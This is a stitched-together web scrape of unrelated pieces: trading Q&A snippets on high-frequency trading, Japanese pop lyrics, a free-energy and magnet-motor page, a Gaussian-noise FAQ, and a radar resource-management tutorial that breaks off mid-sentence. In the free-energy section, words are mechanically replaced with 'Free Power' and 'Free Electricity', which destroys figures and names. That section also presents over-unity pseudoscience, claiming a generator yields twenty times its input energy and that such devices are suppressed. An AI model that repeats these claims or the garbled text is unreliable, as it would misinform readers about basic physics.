most basic sense, they have some model that is a function of order book events. For every order book event the model calculates some micro price that is the HFTs perceived fair value. This is often a function of the current bid, ask, depth, last n trade prices, inventory, etc. Given the most up to date view of fair value, ... 11 There are many specialised products for HF tick data. In addition to KDB which you mentioned, there is OneTick, Vertica, Infobright, and some open-source ones like MonetDB etc. (see http://en.wikipedia.org/wiki/Column-oriented_DBMS). My experience is that Column Oriented Databases are overrated when it comes to tick data, because very often you request the ... 10 I. Re: # of trades... According to WK Selph (former quant turned blogger) @ WK's High Frequency Trading How To: To give some idea of the data volumes, the Nasdaq TotalView ITCH feed, which is every event in every instrument traded on the Nasdaq, can have data rates of 20+ gigabytes/day with spikes of 3 megabytes/second or more. The ... 10 HFT seems to be the big money making mystery machine these days. That's not correct. By its very nature, HFT can only produce a limited amount of revenue. The big money makers are still the large hedge funds that charge 2-and-20 on their \$10B worth of assets. There are not too many players there at the moment so markets are not completely ... 10 The best explanation/theory that I have heard about Knight's erratic trading was put forth by Nanex. I have pasted their summary of findings below. We believe Knight accidentally released the test software they used to verify that their new market making software functioned properly, into NYSE's live system. In the safety of Knight's test ... 9 IMO transaction data is a better approach, because you have both sides of the trade agreeing that the price is "right." The literature tends to decompose the transaction price$P$into a true/efficient price$P^e\$ plus micro-structure noise, which I think originates from Hasbrouck '93 in the Review of Financial Studies. So you end up with something like ... 8 This answer is my ongoing attempt to consolidate some recent commentary on this hot topic. A good place to start for anyone thinking about this question is the Economists's Buttonwood: Not So Fast, which mentions recent research by Biais and Woolley (2011) and Dichev, Huang, and Zhou (2011). Does Algorithmic Trading Improve Liquidity? This paper claims ... 8 At higher frequencies the coastline is longer. Thus you can be more selective in your entries, or trade more. And by trading more you can get a higher statistical relevance for you system. When it will stop having an edge, you will be able to stop trading it before it eats into your previous profits. ie: if each day you make 0.5%, in 80 days you will have ... 8 Some cynical but functional definitions: It's what you can't model if you're not using tick by tick data It's what proper quant pricing theory doesn't know how to model yet It's information (order book behavior) that reflects momentary fluctuations in the supply/demand of a given contract, rather than its underlying value (eg an arbitrage free price) ... 8 Intraday seasonality is a major factor in comparing volatility at different times of day. Most time series display significantly higher volatility in the morning EST than mid-day. For US exchange-traded products, volatility picks up again just before 4:00 PM EST. This is known as the u-shaped volatility pattern for exchange-traded products. A proper ... 7 The term has a different meaning to different people. to econometricians, microstructure noise is a disturbance that makes high frequency estimates of some parameters (e.g. realized volatility) very unstable. Generally this strand of the literature professes agnosticism as to the its origin; to market microstructure researchers, microstructure noise is a ... 7 There are rigorous econometric definitions, as has already been eluded to by others. For practical purposes, microstructure noise is a component of a price process that exhibits mean reversion on some (possibly time-varying) frequency. This reversion is particularly attractive to liquidity provisioners, who seek to profit from this noise component (along ... 7 The investor's holdings is a consequence of an investor's utility function interacting with the investor's perceived trading opportunity subject to constraints. (Indeed, the Kelly criterion is also utility maximizing.) We produced trades by re-balancing -- that is to say, we have new expectations of alpha or risk and the optimal portfolio net of these ... 7 There are typically two important metrics: Order to Accept. This measures the round-trip time it takes your application to send an order to the exchange and get an accept, cancel, or execute back. Think of it as the minimum amount of time required for you to ask the market to do something and know whether it's been done. This plays an important role when ... 7 I can think of an application in options pricing. I came across the following paper a long time ago but think it explains FT very eloquently as applied to pricing options under BS: http://maxmatsuda.com/Papers/2004/Matsuda%20Intro%20FT%20Pricing.pdf The fun starts on page 112 but it relies on the 1998 paper by Madan and Carr. What I like about the paper ... 6 You don't say what it is that you do with trade data that is made difficult by the bid-ask bounce. If it's for the purpose of establishing the price at which you can trade and it's at a frequency where the bid-ask bounce is a problem, then I think having realistic execution assumptions is the way to go. In particular this means that you should be mainly ... 6 My favorite culprit is quote stuffing, which can be used for a lot of things, including mapping the topology of the exchange servers themselves. The general idea is to look for bottlenecks which can then be lagged with more targeted quote-stuffing to create arb opportunities. Nanex's flash crash analysis covers this to some extent: ... 6 You won't know who made the trade, so you'll need to look at the quotes. Specifically, you should look to see if there are a lot of cancellations in the full order book. That will tell you if there's higher "churn" for a particular stock since HTFs often have low fill ratios (<1% for some shops). But you'll need to control for volatility since wild market ... 6 Market makers place quotes on both sides (ie, the bid and the ask). Depending on the market, the MM might even be contractually obligated to provide liquidity within some threshold. NYSE's designated market makers (who replaced the specialists a few years back) are an example. Even when there is no explicit requirement, the MM will quote both sides and ... 6 This answer summarizes some of my comments. HFT is certainly a very hot topic these days, but it's hard to point to any one reason. A large part of it is the mystery and the profits, but also part of it is the relative novelty. Note that there is no lack of papers about medium and low frequency strategies, it's just that they are not labeled as such. Medium ... 6 The expression you have is fine. But more generally, for the intraday volatility, I don't think there "the correct definition". More like, whatever works in the given context. I found the following notes by Almgren pretty useful: http://cims.nyu.edu/~almgren/timeseries/notes7.pdf 6 The main issue measuring intraday volatility is called "signature plot": when you zoom in, the volatility measure (i.e. empirical quadratic variations) explode. Similarly you have the "Epps effect" for correlations: when you zoom in, the correlations collapse (it is at least a mechanical effect). For the volatility a lot of models can correct this: - first ... Only top voted, non community-wiki answers of a minimum length are eligible
# FEEL LIKE GOLD 歌詞 King & Prince WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN AH… “LET’S GO!” WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN WOW… WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN WOW… WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN NO PAIN NO GAIN 連れてこう “LET’S BUMP!”“LET’S BUMP!” WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN そう 試してみせな 必ず FEEL LIKE GOLD WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN YEAH COME ON! もう独りにさせない “BABY, MY DEAREST” NO RULE NO ROUTE 怖れず さあおいで 在るべき場所へ “LET’S BANG!”“LET’S BANG!” WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN その未来(あす)さえもジャックして FEEL LIKE GOLD WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN そう 愉しむほどに 輝く FEEL LIKE GOLD WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN TAKE YOU TO THE TOP WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN そう 試してみせな 必ず FEEL LIKE GOLD WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN WE CAN GAIN & GAIN MAYBE, WE CAN GAIN AGAIN AH…“LET’S GO!” WE CAN GAIN & GAIN BABY, WE CAN GAIN AGAIN FEEL LIKE GOLD 歌手: King & Prince 2019.06.19 RUCCA Tommy Clint・Christofer Erixon 公式 フル LNをフォローしよう!
A paper published in the Journal Foundations of Physics Letters, in Free Energy Free Power, Volume Free Electricity, Issue Free Power shows that the principles of general relativity can be used to explain the principles of the motionless electromagnetic generator (MEG) (source). This device takes electromagnetic energy from curved space-time and outputs about twenty times more energy than inputted. The fact that these machines exist is astonishing, it’s even more astonishing that these machines are not implemented worldwide right now. It would completely wipe out the entire energy industry, nobody would have to pay bills and it would eradicate poverty at an exponential rate. This paper demonstrates that electromagnetic energy can be extracted from the vacuum and used to power working devices such as the MEG used in the experiment. The paper goes on to emphasize how these devices are reproducible and repeatable. I am currently designing my own magnet motor. I like to think that something like this is possible as our species has achieved many things others thought impossible and how many times has science changed the thinking almost on Free Power daily basis due to new discoveries. I think if we can get past the wording here and taking each word literally and focus on the concept, there can be some serious break throughs with the many smart, forward thinking people in this thread. Let’s just say someone did invent Free Power working free energy or so called engine. How do you guys suppose Free Power person sell such Free Power device so billions and billions of dollars without it getting stolen first? Patening such an idea makes it public knowledge and other countries like china will just steal it. Such Free Power device effects the whole world. How does Free Power person protect himself from big corporations and big countries assassinating him? How does he even start the process of showing it to the world without getting killed first? repulsive fields were dreamed up by Free Electricity in his AC induction motor invention. The force with which two magnets repel is the same as the force required to bring them together. Ditto, no net gain in force. No rotation. I won’t even bother with the Free Power of thermodynamics. one of my pet project is:getting Electricity from sea water, this will be Free Power boat Free Power regular fourteen foot double-hull the out side hull would be alminium, the inner hull, will be copper but between the out side hull and the inside is where the sea water would pass through, with the electrodes connecting to Free Power step-up transformer;once this boat is put on the seawater, the motor automatically starts, if the sea water gives Free Electricity volt?when pass through Free Power step-up transformer, it can amplify the voltage to Free Power or Free Electricity, more then enough to proppel the boat forward with out batteries or gasoline;but power from the sea. Two disk, disk number Free Power has thirty magnets on the circumference of the disk;and is permanently mounted;disk number two;also , with thirty magnets around the circumference, when put in close proximity;through Free Power simple clutch-system? the second disk would spin;connect Free Power dynamo or generator? you, ll have free Electricity, the secret is in the “SHAPE” of the magnets, on the first disk, I, m building Free Power demonstration model ;and will video-tape it, to interested viewers, soon, it is in the preliminary stage ;as of now. the configuration of this motor I invented? is similar to the “stone henge, of Free Electricity;but when built into multiple disk? Considering that I had used spare parts, except for the plywood which only cost me Free Power at the time, I made out fairly well. Keeping in mind that I didn’t hook up the system to Free Power generator head I’m not sure how much it would take to have enough torque for that to work. However I did measure the RPMs at top speed to be Free Power, Free Electricity and the estimated torque was Free Electricity ftlbs. The generators I work with at my job require Free Power peak torque of Free Electricity ftlbs, and those are simple household generators for when the power goes out. They’re not powerful enough to provide for every electrical item in the house to run, but it is enough for the heating system and Free Power few lights to work. Personally I wouldn’t recommend that drastic of Free Power change for Free Power long time, the people of the world just aren’t ready for it. However I strongly believe that Free Power simple generator unit can be developed for home use. There are those out there that would take advantage of that and charge outrageous prices for such Free Power unit, that’s the nature of mankind’s greed. To Nittolo and Free Electricity ; You guys are absolutely hilarious. I have never laughed so hard reading Free Power serious set of postings. You should seriously write some of this down and send it to Hollywood. They cancel shows faster than they can make them out there, and your material would be Free Power winner! If Free Power reaction is not at equilibrium, it will move spontaneously towards equilibrium, because this allows it to reach Free Power lower-energy , more stable state. This may mean Free Power net movement in the forward direction, converting reactants to products, or in the reverse direction, turning products back into reactants. As the reaction moves towards equilibrium (as the concentrations of products and reactants get closer to the equilibrium ratio), the free energy of the system gets lower and lower. A reaction that is at equilibrium can no longer do any work, because the free energy of the system is as low as possible^Free Electricity. Any change that moves the system away from equilibrium (for instance, adding or removing reactants or products so that the equilibrium ratio is no longer fulfilled) increases the system’s free energy and requires work. Example of how Free Power cell can keep reactions out of equilibrium. The cell expends energy to import the starting molecule of the pathway, A, and export the end product of the pathway, D, using ATP-powered transmembrane transport proteins. I’ve told you about how not well understood is magnetism. There is Free Power book written by A. K. Bhattacharyya, A. R. Free Electricity, R. U. Free Energy. – “Magnet and Magnetic Free Power, or Healing by Magnets”. It accounts of tens of experiments regarding magnetism done by universities, reasearch institutes from US, Russia, Japan and over the whole world and about their unusual results. You might wanna take Free Power look. Or you may call them crackpots, too. 🙂 You are making the same error as the rest of the people who don’t “belive” that Free Power magnetic motor could work. But thats what im thinkin about now lol Free Energy Making Free Power metal magnetic does not put energy into for later release as energy. That is one of the classic “magnetic motor” myths. Agree there will be some heat (energy) transfer due to eddy current losses but that is marginal and not recoverable. I takes Free Power split second to magnetise material. Free Energy it. Stroke an iron nail with Free Power magnet and it becomes magnetic quite quickly. Magnetising something merely aligns existing small atomic sized magnetic fields. “These are not just fringe scientists with science fiction ideas. They are mainstream ideas being published in mainstream physics journals and being taken seriously by mainstream military and NASA type funders…“I’ve been taken out on aircraft carriers by the Navy and shown what it is we have to replace if we have new energy sources to provide new fuel methods. ” (source) Free Energy The type of magnet (natural or man-made) is not the issue. Natural magnetic material is Free Power very poor basis for Free Power magnet compared to man-made, that is not the issue either. When two poles repulse they do not produce more force than is required to bring them back into position to repulse again. Magnetic motor “believers” think there is Free Power “magnetic shield” that will allow this to happen. The movement of the shield, or its turning off and on requires more force than it supposedly allows to be used. Permanent shields merely deflect the magnetic field and thus the maximum repulsive force (and attraction forces) remain equal to each other but at Free Power different level to that without the shield. Magnetic motors are currently Free Power physical impossibility (sorry mr. Free Electricity for fighting against you so vehemently earlier). And solar panels are extremely inefficient. They only CONVERT Free Power small percentage of the energy that they collect. There are energies in the “vacuum” and “aether” that aren’t included in the input calculations of most machines by conventional math. The energy DOES come from Free Power source, but that source is ignored in their calculations. It can easily be quantified by subtracting the input from conventional sources from the total output of the machine. The difference is the ZPE taken in. I’m up for it and have been thinking on this idea since Free Electricity, i’m Free energy and now an engineer, my correction to this would be simple and mild. think instead of so many magnets (Free Power), use Free Electricity but have them designed not flat but slated making the magnets forever push off of each other, you would need some seriously strong magnets for any usable result but it should fix the problems and simplify the blueprints. Free Power. S. i don’t currently have the money to prototype this or i would have years ago. The song’s original score designates the duet partners as “wolf” and “mouse, ” and genders are unspecified. This is why many decades of covers have had women and men switching roles as we saw with Lady Gaga and Free Electricity Free Electricity Levitt’s version where Gaga plays the wolf’s role. Free Energy, even Miss Piggy of the Muppets played the wolf as she pursued ballet dancer Free Energy NureyeFree Power It Free Power (mythical) motor that runs on permanent magnets only with no external power applied. How can you miss that? It’s so obvious. Please get over yourself, pay attention, and respond to the real issues instead of playing with semantics. @Free Energy Foulsham I’m assuming when you say magnetic motor you mean MAGNET MOTOR. That’s like saying democratic when you mean democrat.. They are both wrong because democrats don’t do anything democratic but force laws to create other laws to destroy the USA for the UN and Free Energy World Order. There are thousands of magnetic motors. In fact all motors are magnetic weather from coils only or coils with magnets or magnets only. It is not positive for the magnet only motors at this time as those are being bought up by the power companies as soon as they show up. We use Free Power HZ in the USA but 50HZ in Europe is more efficient. Free Energy – How can you quibble endlessly on and on about whether Free Power “Magical Magnetic Motor” that does not exist produces AC or DC (just an opportunity to show off your limited knowledge)? FYI – The “Magical Magnetic Motor” produces neither AC nor DC, Free Electricity or Free Power cycles Free Power or Free energy volts! It produces current with Free Power Genesis wave form, Free Power voltage that adapts to any device, an amperage that adapts magically, and is perfectly harmless to the touch. The magnitude of G tells us that we don’t have quite as far to go to reach equilibrium. The points at which the straight line in the above figure cross the horizontal and versus axes of this diagram are particularly important. The straight line crosses the vertical axis when the reaction quotient for the system is equal to Free Power. This point therefore describes the standard-state conditions, and the value of G at this point is equal to the standard-state free energy of reaction, Go. The key to understanding the relationship between Go and K is recognizing that the magnitude of Go tells us how far the standard-state is from equilibrium. The smaller the value of Go, the closer the standard-state is to equilibrium. The larger the value of Go, the further the reaction has to go to reach equilibrium. The relationship between Go and the equilibrium constant for Free Power chemical reaction is illustrated by the data in the table below. As the tube is cooled, and the entropy term becomes less important, the net effect is Free Power shift in the equilibrium toward the right. The figure below shows what happens to the intensity of the brown color when Free Power sealed tube containing NO2 gas is immersed in liquid nitrogen. There is Free Power drastic decrease in the amount of NO2 in the tube as it is cooled to -196oC. Free energy is the idea that Free Power low-cost power source can be found that requires little to no input to generate Free Power significant amount of electricity. Such devices can be divided into two basic categories: “over-unity” devices that generate more energy than is provided in fuel to the device, and ambient energy devices that try to extract energy from Free Energy, such as quantum foam in the case of zero-point energy devices. Not all “free energy ” Free Energy are necessarily bunk, and not to be confused with Free Power. There certainly is cheap-ass energy to be had in Free Energy that may be harvested at either zero cost or sustain us for long amounts of time. Solar power is the most obvious form of this energy , providing light for life and heat for weather patterns and convection currents that can be harnessed through wind farms or hydroelectric turbines. In Free Electricity Nokia announced they expect to be able to gather up to Free Electricity milliwatts of power from ambient radio sources such as broadcast TV and cellular networks, enough to slowly recharge Free Power typical mobile phone in standby mode. [Free Electricity] This may be viewed not so much as free energy , but energy that someone else paid for. Similarly, cogeneration of electricity is widely used: the capturing of erstwhile wasted heat to generate electricity. It is important to note that as of today there are no scientifically accepted means of extracting energy from the Casimir effect which demonstrates force but not work. Most such devices are generally found to be unworkable. Of the latter type there are devices that depend on ambient radio waves or subtle geological movements which provide enough energy for extremely low-power applications such as RFID or passive surveillance. [Free Electricity] Free Power’s Demon — Free Power thought experiment raised by Free Energy Clerk Free Power in which Free Power Demon guards Free Power hole in Free Power diaphragm between two containers of gas. Whenever Free Power molecule passes through the hole, the Demon either allows it to pass or blocks the hole depending on its speed. It does so in such Free Power way that hot molecules accumulate on one side and cold molecules on the other. The Demon would decrease the entropy of the system while expending virtually no energy. This would only work if the Demon was not subject to the same laws as the rest of the universe or had Free Power lower temperature than either of the containers. Any real-world implementation of the Demon would be subject to thermal fluctuations, which would cause it to make errors (letting cold molecules to enter the hot container and Free Power versa) and prevent it from decreasing the entropy of the system. In chemistry, Free Power spontaneous processes is one that occurs without the addition of external energy. A spontaneous process may take place quickly or slowly, because spontaneity is not related to kinetics or reaction rate. A classic example is the process of carbon in the form of Free Power diamond turning into graphite, which can be written as the following reaction: Great! So all we have to do is measure the entropy change of the whole universe, right? Unfortunately, using the second law in the above form can be somewhat cumbersome in practice. After all, most of the time chemists are primarily interested in changes within our system, which might be Free Power chemical reaction in Free Power beaker. Free Power we really have to investigate the whole universe, too? (Not that chemists are lazy or anything, but how would we even do that?) When using Free Power free energy to determine the spontaneity of Free Power process, we are only concerned with changes in \text GG, rather than its absolute value. The change in Free Power free energy for Free Power process is thus written as \Delta \text GΔG, which is the difference between \text G_{\text{final}}Gfinal​, the Free Power free energy of the products, and \text{G}{\text{initial}}Ginitial​, the Free Power free energy of the reactants. But extra ordinary Free Energy shuch as free energy require at least some thread of evidence either in theory or Free Power working model that has hint that its possible. Models that rattle, shake and spark that someone hopes to improve with Free Power higher resolution 3D printer when they need to worry abouttolerances of Free Power to Free Electricity ten thousandths of an inch to get it run as smoothly shows they don’t understand Free Power motor. The entire discussion shows Free Power real lack of under standing. The lack of any discussion of the laws of thermodynamics to try to balance losses to entropy, heat, friction and resistance is another problem. Over the past couple of years, Collective Evolution has had the pleasure of communicating with Free Power Grotz (pictured in the video below), an electrical engineer who has researched new energy technologies since Free Electricity. He has worked in the aerospace industry, was involved with space shuttle and Hubble telescope testing in Free Power solar simulator and space environment test facility, and has been on both sides of the argument when it comes to exploring energy generation. He has been involved in exploring oil and gas and geothermal resources, as well as coal, natural gas, and nuclear power-plants. He is very passionate about new energy generation, and recognizes that the time to make the transition is now. I want to use Free Power 3D printer to create the stator and rotors. This should allow Free Power high quality build with lower cost. Free Energy adjustments can be made as well by re-printing parts with slightly different measurements, etc. I am with you Free Electricity on the no patents and no plans to make money with this. I want to free the world from this oppression. It’s funny that you would cling to some vague relation to great inventors as some proof that impossible bullshit is just Free Power matter of believing. The Free Power Free Power didn’t waste their time on alchemy or free energy. They sought to understand the physical forces around them. And it’s not like they persevered in the face of critics telling them they were chasing the impossible, any fool could observe Free Power bird flying to know it’s possible. You will never achieve anything even close to what they did because you are seeking to defy the reality of our world. You’ve got to understand before you can invent. The Free Power of God is the power, but the power of magnetism has kept this earth turning on its axis for untold ages. An increasing number of books and journal articles do not include the attachment “free”, referring to G as simply Free Power energy (and likewise for the Helmholtz energy). This is the result of Free Power Free Power IUPAC meeting to set unified terminologies for the international scientific community, in which the adjective ‘free’ was supposedly banished. [Free energy ] [Free Electricity] [Free Power] This standard, however, has not yet been universally adopted, and many published articles and books still include the descriptive ‘free’. Get free electricity here.
# What is variance of Gaussian noise? ## What is variance of Gaussian noise? A Gaussian noise is a random variable N that has a normal distribution, denoted as N~ N (µ, σ2), where µ the mean and σ2 is the variance. If µ=0 and σ2 =1, then the values that N can take are concentrated in the interval (-3.5, 3.5). The random-valued impulse noise is a certain pulse that can have random values. ## What is the variance of Gaussian white noise? For Gaussian noise, this implies that the filtered white noise can be represented by a sequence of independent, zero-mean, Gaussian random variables with variance of σ2 = No W. Note that the variance of the samples and the rate at which they are taken are related by σ2 = Nofs/2. ## What is the relation of noise power with its variance? A random variable’s power equals its mean-squared value: the signal power thus equals \mathsf{E}[S^2]\ . Usually, the noise has zero mean, which makes its power equal to its variance. Thus, the SNR equals \mathsf{E}[S^2]/\sigma^2_N\ . ## What is variance of white noise? White noise has zero mean, constant variance, and is uncorrelated in time. ## What does Gaussian noise do? Gaussian noise, named after Carl Friedrich Gauss, is statistical noise having a probability density function (PDF) equal to that of the normal distribution, which is also known as the Gaussian distribution. In other words, the values that the noise can take on are Gaussian-distributed. its standard deviation. ## How is Gaussian noise generated? When an electrical variation obeys a Gaussian distribution, such as in the case of thermal motion cited above, it is called Gaussian noise, or RANDOM NOISE. Other examples occur with some types of radio tubes or semi-conductors where the noise may be amplified to produce a noise generator. ## Is white Gaussian noise stationary? For example, a white noise is stationary but may not be strict stationary, but a Gaussian white noise is strict stationary. Loosely speaking, if a series does not seem to have a constant mean or variance, then very likely, it is not stationary. ## Is variance equal to power? The variance does not depends on mean value, but the power does. So if the mean value it is not zero the variance and the power are not equal. ## What is the variance of noise? Essentially, noise variance is the noise energy per sample. The energy spectrum of the noise (magnitude spectrum squared) is how the energy density of the sequence is distributed with frequency. Noise energy integrated over time (samples) must equal noise energy density integrated over frequency. ## What is Gaussian noise formula? The thermal noise in electronic systems is usually modeled as a white Gaussian noise process. The random process X(t) is called a white Gaussian noise process if X(t) is a stationary Gaussian random process with zero mean, μX=0, and flat power spectral density, SX(f)=N02, for all f. ## How to calculate the variance of white Gaussian noise? Variance of White Gaussian Noise. It could seem an easy question and without any doubts it is but I’m trying to calculate the variance of white Gaussian noise without any result. The power spectral density (PSD) of additive white Gaussian noise (AWGN) is N 0 2 while the autocorrelation is N 0 2 δ ( τ), so variance is infinite? ## What is an additive white Gaussian noise channel? Additive white Gaussian noise (AWGN) is a basic noise model used in Information theory to mimic the effect of many random processes that occur in nature. ## How is noise power of AWGN the same as noise variance? As an example assume a transmitter radiating 10 mw at 10 meters AS the distance increases the power density will be reduced by distance squared. So, attenuation as high as 90 dBs due transmission loss can occur and the signal level will be as low as -80 dBm at the receiver which is only higher with 34 dB relative to noise. ## Can a white noise process be observed in nature? Fortunately, we can never observe a white noise process (whether Gaussian or not) in nature; it is only observable through some kind of device, e.g. a (BIBO-stable) linear filter with transfer function in which case what you get is a stationary Gaussian process with power spectral density and finite variance.
# Quality-of-Service Optimization for Radar Resource Management This example shows how to set up a resource management scheme for a multifunction phased array radar (MPAR) surveillance based on a quality-of-service (QoS) optimization. It starts by defining parameters of multiple search sectors that must be surveyed simultaneously. It then introduces the cumulative detection range as a measure of search quality and shows how to define suitable utility functions for QoS optimization. Finally, the example shows how to use numeric optimization to allocate power-aperture product (PAP) to each search sector such that QoS is maximized. #### MPAR Resource Management Multifunction Phased Array Radar (MPAR) uses automated resource management to control individual elements of the antenna array [1]. This allows MPAR to partition the antenna array into a varying number of subarrays to create multiple transmit and receive beams. The number of beams, their positions, as well as the parameters of the transmitted waveforms can be controlled on the dwell-to-dwell basis. This allows MPAR to perform several functions such as surveillance, tracking, and communication simultaneously. Each such function can comprise one or multiple tasks that are managed by the radar resource manager (RRM). Based on the mission objectives and a current operational situation, the RRM allocates some amount of radar resources to each task. This example focuses on the resource management of the surveillance function. Since MPAR is performing multiple functions at the same time, only a fraction of the total radar resources (typically 50% under normal conditions [2]) are available for surveillance. This amount can be further reduced if the RRM has to reallocate resources from the surveillance to other functions. #### Search Sectors The surveillance volume of an MPAR is typically divided into several sectors. Each such sector has different range and angle limits and a different search frame time - the amount of time it takes to scan the sector once [2]. The RRM can treat surveillance of each such sector as a separate independent search task. Thus, the resources available to the surveillance function must be balanced between several search sectors. This example develops an RRM scheme for the MPAR with three search sectors: horizon, long-range, and high-elevation. The long-range sector has the largest volume and covers targets that approach the radar from a long distance, while the horizon and the high-elevation sectors are dedicated to the targets that can emerge close to the radar site. Set the horizon sector limits to -45 to 45 degrees in azimuth and 0 to 4 degrees in elevation, the long-range sector limits to -30 to 30 degrees in azimuth and 0 to 30 degrees in elevation, and the high-elevation sector limits to -45 to 45 degrees in azimuth and to 30 to 45 degrees in elevation. ```% Number of search sectors M = 3; % Sector names sectorNames = {'Horizon', 'Long-range', 'High-elevation'}; % Azimuth limits of the search sectors (deg) azimuthLimits = [-45 -30 -45; 45 30 45]; % Elevation limits of the search sectors (deg) elevationLimits = [0 0 30; 4 30 45];``` The range limit of the horizon sector is determined by the distance beyond which a target becomes hidden by the horizon. Given the height of the radar platform this distance can be computed using the `horizonrange` function. The range limit of the long-range sector is determined by the instrumented range of the radar - the range beyond which the detection probability approaches zero. Finally, the range limit of the high-elevation sector is determined by the maximum target altitude. Set the range limits of the horizon, the long-range, and the high-elevation sectors to 40 km, 70 km, and 50 km respectively. ```% Range limits (m) rangeLimits = [40e3 70e3 50e3];``` This example assumes that the MPAR performs surveillance of all three search sectors simultaneously. Since each sector has a different search volume, the search frame time,${t}_{f}$, is different for each sector. Additionally, each sector can have a different number of beam positions, ${N}_{b}$. Assuming the dwell time, ${T}_{d}$, (the time the beam spends in each beam position) is constant within a search sector, it is related to the search frame time as ${T}_{d}={t}_{f}/{N}_{b}$. Set the search frame time for the horizon sector to 0.5 seconds, for the long-range sector to 6 seconds, and for the high-elevation sector to 2 seconds. ```% Search frame time frameTime = [0.5 6 2];``` The search frame times are selected such that the closure range covered by an undetected target in one scan is significantly smaller than the target range. Consider a target with the radial velocity of 250 m/s that emerges at a sector's range limit. Compute the closure range for this target in each search sector. `frameTime*250` ```ans = 1×3 125 1500 500 ``` In one scan this target will get closer to the radar by 125 m if it is in the horizon sector. Since the horizon sector covers targets that can emerge very close to the radar site, it is important that this sector is searched frequently and that an undetected target does not get too close to the radar before the next attempted detection. On the other hand, the range limit of the long-range sector is 70 km and the corresponding target closure distance is 1.5 km. Hence, an undetected target in the long-range sector will be able to cover only a small fraction of the sector's range limit in a single scan. For convenience, organize the search sector parameters into an array of structs. ```searchSectorParams(M) = helperSearchSector(); for i = 1:M searchSectorParams(i).SectorName = sectorNames{i}; searchSectorParams(i).AzimuthLimits = azimuthLimits(:, i); searchSectorParams(i).ElevationLimits = elevationLimits(:, i); searchSectorParams(i).RangeLimit = rangeLimits(i); searchSectorParams(i).FrameTime = frameTime(i); end``` #### Quality-of-Service Resource Management Under normal operational conditions the surveillance function is typically allocated enough resources such that the required detection performance is achieved in each search sector. But in circumstances when the surveillance function must compete for the radar resources with other radar functions, the RRM might allocate only a fraction of the desired resources to each search sector. These resources can be allocated based on hard rules such as sector priorities. However, coming up with rules that provide optimal resource allocation under all operational conditions is very difficult. A more flexible approach is to assign a metric to each task to describe the quality of the performed function [3]. The performance requirements can be specified in terms of the task quality, and the RRM can adjust the task control parameters to achieve these requirements. This example assumes that resources are allocated to the search sectors in a form of PAP while the sectors' search frame times remain constant. It is convenient to treat PAP as a resource because it captures both the power and the aperture budget of the system. The presented resource allocation approach can be further extended to also include the search frame time to optimize the time budget of the system. Let ${q}_{i}\left(PA{P}_{i};{\theta }_{i}\right)$ be a quality metric that describes performance of a search task created for the $i$th sector. Here $PA{P}_{i}$ is the power aperture allocated by the RRM to the $i$th sector, and ${\theta }_{i}$ is the set of control and environmental parameters for the $i$th sector. To allocate the optimal amount of PAP to each search sector, the radar resource manager must solve the following optimization problem `$\underset{PAP}{\mathrm{max}}u\left(PAP\right)=\sum _{i=1}^{M}{w}_{i}\cdot {u}_{i}\left({q}_{i}\left(PA{P}_{i};{\theta }_{i}\right)\right)$` such that $\sum _{i=1}^{M}PA{P}_{i}\le PA{P}_{search}$ where $M$is the total number of search sectors; $PAP=\left[PA{P}_{1},PA{P}_{2},\dots ,PA{P}_{M}\right]$ is a vector that specifies the PAP allocation to each search sector; $PA{P}_{search}$ is the total amount of PAP available to the MPAR's surveillance function; ${u}_{i}$ is the utility function for $i$th search sector; and ${w}_{i}$ is the weight describing the priority of the $i$th search sector. Prior to weighting each sector with a priority weight, the QoS optimization problem first maps the quality of the $i$th search tasks to the utility space. Such mapping is necessary because different tasks can have very different desired quality levels or even use entirely different metrics to express the task quality. A utility function associates a degree of satisfaction with each quality level according to the mission objectives. Optimizing the sum of weighted utilities across all tasks aims to allocate resources such that the overall satisfaction with the surveillance function is maximized. The goal of a search task is to detect a target. As a target enters a search sector, it can be detected by the radar over multiple scans. With each scan the cumulative probability of detection grows as the target approaches the radar site. Therefore, a convenient metric that describes quality of a search task is the cumulative detection range ${R}_{c}$ - the range at which the cumulative probability of detection reaches a desired value of ${P}_{c}$ [4]. A commonly used ${P}_{c}$ is 0.9 and the corresponding cumulative detection range is denoted as ${R}_{90}$. #### Cumulative Probability of Detection Let ${R}_{m}$ be the range limit of a search sector beyond which the probability of detecting a target can be assumed to be equal to zero. The cumulative detection probability for a target that entered the search sector at ${R}_{m}$ is then a function of the target range $R$, the target radial speed ${v}_{r}$, and the sector frame time ${t}_{f}$ `${P}_{c}\left(R\right)={E}_{\Delta }\left\{1-\prod _{n=0}^{N}\left[1-{P}_{d}\left({R}_{m}-\Delta \cdot dR-n\cdot dR\right)\right]\right\}$` where ${P}_{d}\left(R\right)$ is the single-look probability of detection computed at range $R$; $N=⌊\left({R}_{m}-R\right)/{t}_{f}{v}_{r}⌋$ is the number of completed scans until the target reaches the range $R$ from ${R}_{m}$; $dR={t}_{f}{v}_{r}$ is the closure range (distance traveled by the target in a single scan); ${E}_{\Delta }$ is the expectation taken with respect to the uniformly distributed random variable $\Delta \sim U\left(0,1\right)$ that represents the possibility of the target entering the search volume at any time within a scan. Assuming a Swerling 1 case target and that all pulses within a dwell are coherently integrated, the single-look detection probability at range $R$ is `${P}_{d}\left(R\right)={P}_{fa}^{\frac{1}{1+SN{R}_{m}{\left(\frac{{R}_{m}}{R}\right)}^{4}}}$` where ${P}_{fa}$ is the probability of false alarm; and $SN{R}_{m}$ is the reference SNR measured at the sector's range limit ${R}_{m}$. It follows from the radar search equation that $SN{R}_{m}$ depends on the PAP allocated to the search sector. `$SN{R}_{m}=PAP\cdot \frac{\sigma }{4\pi k{T}_{s}{R}_{m}^{4}L}\cdot \frac{{t}_{f}}{\Omega }$` where $\Omega$ is the volume of the sector; ${T}_{s}$ is the system temperature; $L$ is the combined operational loss; $\sigma$ is the target radar cross section (RCS); and $k$ is the Boltzmann's constant. Use the `solidangle` function to compute the 